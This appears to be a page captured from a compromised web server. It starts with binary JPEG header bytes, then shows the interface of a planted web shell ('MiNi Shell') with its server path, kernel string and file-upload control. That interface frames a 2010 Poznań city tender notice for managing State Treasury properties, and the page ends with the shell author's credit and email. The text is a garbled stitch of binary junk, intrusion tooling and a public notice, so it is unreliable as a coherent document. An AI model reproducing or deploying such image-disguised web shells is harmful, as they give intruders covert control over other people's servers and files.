JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100902/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100902/239145-N-2010.html

<p class="kh_header"><b>Poznań: Zarządzanie nieruchomościami oraz utrzymanie czystości na terenie nieruchomości Skarbu Państwa</b><br>
<b>Numer ogłoszenia: 239145 - 2010; data zamieszczenia: 02.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Poznania, Biuro Zamówień Publicznych , Pl. Kolegiacki 17, 61-841 Poznań, woj. wielkopolskie, tel. (061) 878 52 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.city.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie nieruchomościami oraz utrzymanie czystości na terenie nieruchomości Skarbu Państwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usługi zarządzania zabudowanymi nieruchomościami Skarbu Państwa oraz lokalami mieszkalnymi nie stanowiącymi odrębnych nieruchomości, zgodnie z przepisami ustawy z dnia 21 sierpnia 1997r. 
o gospodarce nieruchomościami i standardami zawodowymi zarządców nieruchomości oraz utrzymanie czystości na terenie nieruchomości. 
Zamówienie obejmuje następujące nieruchomości (prawa związane z nieruchomościami):
1)	Nieruchomość Skarbu Państwa położona w Poznaniu przy ul. Bukowskiej 53a, stanowiącą wydzielony geodezyjnie obszar - obręb Jeżyce, arkusz mapy 17, działka 
nr 76/4 o łącznej powierzchni 7103,00 m2, zabudowana:
	budynkiem konsulatu o pow. użytkowej 390,46 m2,
	budynkiem gospodarczym o pow. użytkowej 225,98 m2,
	budynkiem garażowym o pow. 96,86 m2.
Ponadto na terenie nieruchomości znajdują się następujące budowle: wiaty stalowe 
o łącznej pow. 126 m2 oraz altana ogrodowa. Nieruchomość jest siedzibą Konsulatu Generalnego Federacji Rosyjskiej.
W ramach usługi zarządzania ww. nieruchomością wykonawca zobowiązany będzie dodatkowo prowadzić całodobowy dozór techniczny oraz konserwacje i serwisowanie oświetlenia bramy wjazdowej oraz kotłowni gazowej przez uprawnione do tego służby.
Dla nieruchomości prowadzona jest księga wieczysta PO1P-00146864-3.
2)	Nieruchomość Skarbu Państwa, położona w Poznaniu przy ul. Marii Magdaleny 5,5a, stanowiąca wydzielony geodezyjnie obszar  - obręb Poznań, arkusz mapy 34 działka nr 3/8 o powierzchni 2944 m2 oraz działka nr 6/4  o powierzchni 46 m2, zabudowana:
	budynkiem mieszkalnym, w którym znajduje się 6 lokali mieszkalnych o łącznej powierzchni użytkowej lokali oraz powierzchni przynależnej 411,62 m2,
	 budynkiem warsztatowym o powierzchni użytkowej 438,21 m2,
	budynkiem garażowym A o powierzchni użytkowej 99,03 m2,
	budynkiem garażowym B o powierzchni użytkowej 548,73 m2;
	portiernią o powierzchni 9,59 m2.
Dla nieruchomości prowadzona jest księga wieczysta PO1P/00034107/1.
3)	Nieruchomość Skarbu Państwa, położona w Poznaniu przy pl. Wolności 17  - obręb Poznań, arkusz mapy 19, działka nr 17 o powierzchni 1576 m2, zabudowanej budynkami usługowo - biurowo - mieszkalnymi. Przedmiotem zarządzania jest udział w wysokości 39617/384819 części, który stanowi 5 lokali mieszkalnych o łącznej powierzchni 396,17 m2.
Dla nieruchomości prowadzona jest księga wieczysta PO1P/00040691/6.
4)	Nieruchomość lokalowa Skarbu Państwa, położona w Poznaniu przy ul. Kasprzaka 56 - lokal  nr 2 o pow. użytkowej 114,86 m2. Dla nieruchomości prowadzona jest księga wieczysta PO1P/00101204/2. Z lokalem związany jest udział wynoszący ? części 
w prawie użytkowania wieczystego gruntu i części wspólnych budynku i urządzeń, które nie służą do wyłącznego użytku właścicieli lokali, objęty księgą wieczystą PO1P/00061840/9
5)	Nieruchomość lokalowa Skarbu Państwa, położona w Poznaniu na os. Armii Krajowej 80 - lokal nr 1 o powierzchni użytkowej 47,20 m2. Dla nieruchomości prowadzona jest księga wieczysta PO2P/00239214/8. Z lokalem związany jest udział wynoszący 4720/11764053 części w prawie własności gruntu i części wspólnych budynku i urządzeń, które nie służą do wyłącznego użytku właścicieli lokali, objęty księgą wieczystą PO2P/00229532/0.
6)	Nieruchomość lokalowa Skarbu Państwa, położona w Poznaniu na os. Wichrowe Wzgórze 30 - lokal nr 45 o powierzchni użytkowej 32,00 m2 oraz przynależnej do lokalu piwnicy o pow. 3,30 m2. Dla nieruchomości prowadzona jest księga wieczysta PO1P/00263491/3. Z lokalem związany jest udział wynoszący 353/67589 części w prawie własności gruntu i części wspólnych budynku i urządzeń, które nie służą do wyłącznego użytku właścicieli lokali, objęty księgą wieczystą PO1P/00232377/2.
7)	Przysługujące Skarbowi Państwa spółdzielcze własnościowe prawo do lokalu mieszkalnego, w budynku położonym w Poznaniu przy ul. Lodowej 7, posadowionym na nieruchomości objętej księgą wieczystą PO1P/00201532/1 - lokal nr 5 o powierzchni użytkowej 39,78 m2.
Powierzchnia zasobu nieruchomości objętego zamówieniem może ulec zmianie, 
w szczególności w następstwie zbycia, zwrotu nieruchomości na podstawie orzeczeń sądu i organów administracji, rozbiórek budynków, wyłączenia z eksploatacji, aktualizacji powierzchni po przeprowadzonej inwentaryzacji nieruchomości, przekazania nieruchomości innemu podmiotowi oraz podjęcia innej decyzji o sposobie zagospodarowania nieruchomości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego na podstawie art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.33.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości: 1250,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykonanie z należytą starannością, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 5 usług zarządzania nieruchomościami o łącznej powierzchni użytkowej co najmniej 2000 m2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadanie na terenie miasta Poznania, ewentualne zorganizowanie i uruchomienie w terminie 14 dni od rozpoczęcia umowy, na swój koszt, Punktu Obsługi Klienta oraz zapewnienie dyżuru w dni robocze (od poniedziałku do piątku, za wyjątkiem dni ustawowo wolnych od pracy), co najmniej 8 godzin (w jednym ciągu czasowym, tj. od godz. 8:00 do 16:00), w tym przynajmniej jeden raz w tygodniu do godziny 18:00.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponowanie minimum dwoma osobami, legitymującymi się licencją zawodową zarządcy nieruchomości udzieloną przez uprawniony organ,
- dysponowania osobami które posiadają uprawnienia budowlane do sprawowania samodzielnych funkcji w budownictwie w zakresie kierowania robotami budowlanymi w specjalnościach:
a)	konstrukcyjno-budowlanej - co najmniej 1 osoba,
b)	instalacyjnej w zakresie instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych - co najmniej 1 osoba,
c)	instalacyjnej w zakresie instalacji i urządzeń elektrycznych - co najmniej 1 osoba.
Dopuszcza się sytuację, aby Wykonawca dysponował mniejszą ilością osób niż suma wymienionych w punktach a)-c), z których każda posiadać będzie uprawnienia z kilku ww. branży, ale z zastrzeżeniem, że łączna ilość osób legitymujących się uprawnieniami nie może być mniejsza niż 2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzenia działalności na sumę gwarancyjną nie mniejszą niż równowartość w złotych kwoty 50 000 euro.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany Formularz Ofertowy wraz z kalkulacją cenową,
2. Oświadczenie Wykonawcy, iż dysponuje albo najpóźniej 14 dni od podpisania umowy o udzielenie zamówienia będzie dysponował miejscem, w którym w okresie trwania umowy będzie zlokalizowany Punkt Obsługi Klienta</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w następujących przypadkach:
1.	zmiany stawki podatku od towarów i usług VAT,
2.	zmiany obowiązujących przepisów prawa, w tym prawa miejscowego,
3.	zmiany wykazu czynności zarządzania (załącznik numer 3 do umowy), z zastrzeżeniem przypadku, że wprowadzone przez Zamawiającego zmiany nie spowodują znacznego wzrostu czasochłonności nakładu pracy Zarządcy lub znacznego zwiększenia kosztów świadczenia usług. Postanowienie to dotyczy w szczególności takich sytuacji jak: zastąpienia jednych czynności innymi, wprowadzenia nowych zasad (lub wzorów) sprawozdawczości z wykonanych czynności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.city.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, pok. 443.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2010 godzina 11:45, miejsce: Urząd Miasta Poznania, Biuro Zamówień Publicznych,
Plac Kolegiacki 17, 
61-841 Poznań,
pok. nr 446..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com